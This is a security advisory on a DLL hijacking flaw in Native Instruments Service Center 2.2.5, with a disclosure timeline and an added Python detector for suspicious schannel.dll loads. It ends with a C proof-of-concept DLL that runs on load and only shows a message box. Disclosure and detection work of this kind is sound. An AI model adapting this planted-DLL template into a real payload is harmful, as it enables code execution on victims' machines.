Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability

2010-11-20T00:00:00
ID ZSL-2010-4975
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-11-20T00:00:00

Description

Title: Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability
Advisory ID: ZSL-2010-4975
Type: Local/Remote
Impact: System Access
Risk: (5/5)
Release Date: 20.11.2010

Summary

The NI Service Center is a service used for Product Activation.

Description

The Service Center suffers from a DLL hijacking vulnerability, which could be exploited by remote attackers to compromise a vulnerable system. This issue is caused by the application insecurely loading certain libraries ("schannel.dll") from the current working directory, which could allow attackers to execute arbitrary code by tricking a user into opening an activation return file (.naf) from a network share.
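As an added defender-side example (not part of the advisory or the vendor's code): the load described above shows up in image-load telemetry as schannel.dll being resolved from somewhere other than the Windows system directory, and the Python below flags exactly that over a few constructed Sysmon Event ID 7 records. The event layout, the ServiceCenter.exe process name and all paths are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed Sysmon "Image loaded" (Event ID 7) records, reduced to the fields this
# check uses and without the real event namespace. Paths and the process name
# ServiceCenter.exe are assumptions, not telemetry from the advisory.
SAMPLE_EVENTS = [
    r"""<Event><System><EventID>7</EventID></System><EventData>
    <Data Name="Image">C:\Program Files\Native Instruments\Service Center\ServiceCenter.exe</Data>
    <Data Name="ImageLoaded">C:\Windows\System32\schannel.dll</Data>
    <Data Name="Signed">true</Data></EventData></Event>""",
    r"""<Event><System><EventID>7</EventID></System><EventData>
    <Data Name="Image">C:\Program Files\Native Instruments\Service Center\ServiceCenter.exe</Data>
    <Data Name="ImageLoaded">\\fileserver\share\activation\schannel.dll</Data>
    <Data Name="Signed">false</Data></EventData></Event>""",
    r"""<Event><System><EventID>7</EventID></System><EventData>
    <Data Name="Image">C:\Windows\explorer.exe</Data>
    <Data Name="ImageLoaded">C:\Windows\System32\shell32.dll</Data>
    <Data Name="Signed">true</Data></EventData></Event>""",
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")  # legitimate homes
WATCHED_DLLS = {"schannel.dll"}  # names the advisory reports as search-path resolved

def parse_event(xml_text):
    """Return (event_id, {field: value}) for one Sysmon event."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.iter("Data")}
    return int(root.findtext("System/EventID")), fields

def classify_load(image_loaded):
    """None if a watched DLL came from a system directory, else why it is suspect."""
    path = image_loaded.strip().lower()
    directory, _, name = path.rpartition("\\")
    if name not in WATCHED_DLLS or directory in SYSTEM_DIRS:
        return None
    if path.startswith("\\\\"):
        return "remote-share"  # UNC path: the network-share scenario in the advisory
    return "non-system-dir"

def find_hijack_candidates(events):
    """Return (process, dll path, reason, signed) for each suspicious Event ID 7 load."""
    hits = []
    for xml_text in events:
        event_id, f = parse_event(xml_text)
        if event_id == 7:
            reason = classify_load(f.get("ImageLoaded", ""))
            if reason:
                hits.append((f.get("Image"), f.get("ImageLoaded"), reason, f.get("Signed")))
    return hits
```

On a live host the same records come from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log exported as XML; a hit on a remote-share path is the exact pattern the advisory describes.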

Vendor

Native Instruments GmbH - <http://www.native-instruments.com>

Affected Version

2.2.5 (R596)

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

[06.11.2010] Vulnerability discovered.
[09.11.2010] Contact with the vendor.
[09.11.2010] Vendor replies.
[09.11.2010] Explained to the vendor that we want to report a vulnerability.
[09.11.2010] Vendor answers in confusion.
[09.11.2010] Explained in detail what this is all about.
[10.11.2010] Vendor informs the corresponding department and states that if they're interested, they'll contact us.
[18.11.2010] Nobody gets in touch with us.
[19.11.2010] Informed the vendor that the public disclosure will occur on the 20th of November.
[20.11.2010] Public advisory released.

PoC

scenter_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[2] <http://packetstormsecurity.org/files/96001>
[3] <http://www.securityfocus.com/bid/44989>
[4] <http://xforce.iss.net/xforce/xfdb/61321>

Changelog

[20.11.2010] - Initial release
[22.11.2010] - Added references [1], [2] and [3]
[24.11.2010] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

/*

 Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability


 Vendor: Native Instruments GmbH
 Product web page: http://www.native-instruments.com
 Affected version: 2.2.5 (R596)

 Summary: The NI Service Center is a service used for Product Activation.

 Desc: The Service Center suffers from a DLL hijacking vulnerability, which could be
 exploited by remote attackers to compromise a vulnerable system. This issue is
 caused due to the application insecurely loading certain libraries ("schannel.dll")
 from the current working directory, which could allow attackers to execute arbitrary
 code by tricking a user into opening an activation return file (.naf) from a network
 share.

 Tested on: Microsoft Windows XP Professional SP3 (English)

 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 Advisory ID: ZSL-2010-4975
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4975.php

 06.11.2010

*/


#include <windows.h>

/* Prototype so DllMain can call the function defined below it; the original
   relied on an implicit declaration, which C99 and later compilers reject. */
static void dll_mll(void);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	(void)hinstDLL;
	(void)lpvReserved;

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			/* Runs as soon as the vulnerable process loads this file as "schannel.dll" */
			dll_mll();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}

	return TRUE;
}

/* Harmless payload: only proves that code from the planted library executed. */
static void dll_mll(void)
{
	MessageBoxA(NULL, "DLL Hijacked!", "DLL Message", MB_OK);
}